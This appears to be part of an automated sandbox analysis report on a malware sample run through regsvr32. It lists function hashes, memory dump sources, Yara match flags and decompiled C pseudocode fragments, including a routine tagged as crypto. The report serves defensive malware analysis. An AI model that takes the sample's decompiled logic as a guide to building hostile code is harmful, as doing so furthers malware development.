                                                                                                                                                                                                            • String ID: 6N
                                                                                                                                                                                                            • API String ID: 0-1503784733
                                                                                                                                                                                                            • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                            • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FBDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: H-
                                                                                                                                                                                                            • API String ID: 0-1037293833
                                                                                                                                                                                                            • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                            • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F96D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: u*AR
                                                                                                                                                                                                            • API String ID: 0-611844632
                                                                                                                                                                                                            • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                            • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EDBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: g*`
                                                                                                                                                                                                            • API String ID: 0-1142845859
                                                                                                                                                                                                            • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                            • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FA6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: n*=
                                                                                                                                                                                                            • API String ID: 0-1578461029
                                                                                                                                                                                                            • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                            • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E92F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 5$
                                                                                                                                                                                                            • API String ID: 0-3756733592
                                                                                                                                                                                                            • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                            • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                                                                                                                            0x18000a87c
                                                                                                                                                                                                            0x18000a885
                                                                                                                                                                                                            0x18000a893

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                            • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                            • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EB258 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                                                                                                                            • Instruction ID: 9777817b081f39f8e60dfdb959296b45d4afe326ecdccde192d5710588f0a451
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECE11574E0460ACFDF58DFA8C49A9AEBBB2FB45348F004159D80AE72A0D7749615CBC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E1000 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                                                                                                                            • Instruction ID: 79e42d445dd4af4ae74fc2ee2c4a66fcb61a97888cb392d5eba5a3e384439d5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BC1CEB9903609CFDF68CF38C49A59D3BF1EF64308F204119EC269A2A6D774D529CB48
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F020C Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                                                                                                                            • Instruction ID: 9474a6e24e2a038e493c4e826a67a5a07ed7f2aa302921bb97bb9b02e52f150d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9B11674E04B089FDFA9CFA8D48A9DEBBF2FB44348F004519D846A7290D7B8541ACB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EBA2C Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                                                                                                                            • Instruction ID: e803900949f6b0cc70468565b9e5f338abe3458c75a8c71073e49a5d8518e92c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCB1F7746087C88FDBBECF24C8892DA7BA9FB46708F504219E9CA8E254DB745745CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FD770 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                                                                                                                            • Instruction ID: 89c4972beab886f70ba13b30b116082238729e92be28d812b31c141c8560a3b8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D814B74D08709EFCB58DFA8C49599EBBF1FB44344F00856EE849EB290DB749A09CB81
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 029027EC Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                                                                                                                            • Instruction ID: a9ba5fc2999e21284f9a79bd547b1909a11264cb030633c4209ad9cab33e2bca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B8115B151074D9FDF88CF28C8C99D97BB1FB483A8FA56218FC0AA6294D774D485CB84
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E3ABC Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                                                                                                                            • Instruction ID: 6bc089aabcc880770d5e689089f54c5105d1ee8253ac60c3d9905454f429cbe2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B461207461464C8BDF28DF78D4962AD3BE1FB45308F20613DE86ACB2A2D774D906CB44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FE310 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                                                                                                                            • Instruction ID: edf6d83800f0f6d03480e89925fa2bdee214a0b71b87d7ae43490a085072d01b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98710674508789CBDBF9CF24C8896DE7BE4FB88704F10461DE99A8B2A0DB749685CF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180007110 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                            • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E2C78 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                            • Instruction ID: d463d3d80b127674357ea6a63587cce6720ed7c41d0426c7689e38ba01ceb260
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED51E474518788CBDBBADF28C8992D97BB1FB58304F90861DD84E8E290DB789749CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180006818 Relevance: .1, Instructions: 126COMMONLIBRARYCODECrypto
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                            			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0xc23e8d4af72c
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0xc23e8d4af72c
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0xc23e8d4af72c
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0xc23e8d4af72c
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0xc23e8d4af72c
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}
























                                                                                                                                                                                                            0x180006818
                                                                                                                                                                                                            0x180006818
                                                                                                                                                                                                            0x180006818
                                                                                                                                                                                                            0x18000681d
                                                                                                                                                                                                            0x180006822
                                                                                                                                                                                                            0x180006830
                                                                                                                                                                                                            0x180006835
                                                                                                                                                                                                            0x180006838
                                                                                                                                                                                                            0x18000683e
                                                                                                                                                                                                            0x180006844
                                                                                                                                                                                                            0x180006851
                                                                                                                                                                                                            0x18000685a
                                                                                                                                                                                                            0x180006864
                                                                                                                                                                                                            0x180006868
                                                                                                                                                                                                            0x18000686b
                                                                                                                                                                                                            0x180006871
                                                                                                                                                                                                            0x18000687f
                                                                                                                                                                                                            0x180006889
                                                                                                                                                                                                            0x18000688d
                                                                                                                                                                                                            0x180006890
                                                                                                                                                                                                            0x180006893
                                                                                                                                                                                                            0x18000689a
                                                                                                                                                                                                            0x18000689c
                                                                                                                                                                                                            0x18000689c
                                                                                                                                                                                                            0x1800068a6
                                                                                                                                                                                                            0x1800068b0
                                                                                                                                                                                                            0x1800068b8
                                                                                                                                                                                                            0x1800068ba
                                                                                                                                                                                                            0x1800068be
                                                                                                                                                                                                            0x1800068ca
                                                                                                                                                                                                            0x1800068d1
                                                                                                                                                                                                            0x1800068d4
                                                                                                                                                                                                            0x1800068dc
                                                                                                                                                                                                            0x1800068e9
                                                                                                                                                                                                            0x1800068ed
                                                                                                                                                                                                            0x180006905
                                                                                                                                                                                                            0x180006909
                                                                                                                                                                                                            0x18000690c
                                                                                                                                                                                                            0x180006914
                                                                                                                                                                                                            0x180006917
                                                                                                                                                                                                            0x18000691e
                                                                                                                                                                                                            0x18000693d
                                                                                                                                                                                                            0x180006943
                                                                                                                                                                                                            0x180006946
                                                                                                                                                                                                            0x180006959
                                                                                                                                                                                                            0x180006962
                                                                                                                                                                                                            0x180006968
                                                                                                                                                                                                            0x180006979
                                                                                                                                                                                                            0x180006982
                                                                                                                                                                                                            0x180006986
                                                                                                                                                                                                            0x180006992
                                                                                                                                                                                                            0x18000699b
                                                                                                                                                                                                            0x1800069a6
                                                                                                                                                                                                            0x1800069aa
                                                                                                                                                                                                            0x1800069c7

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
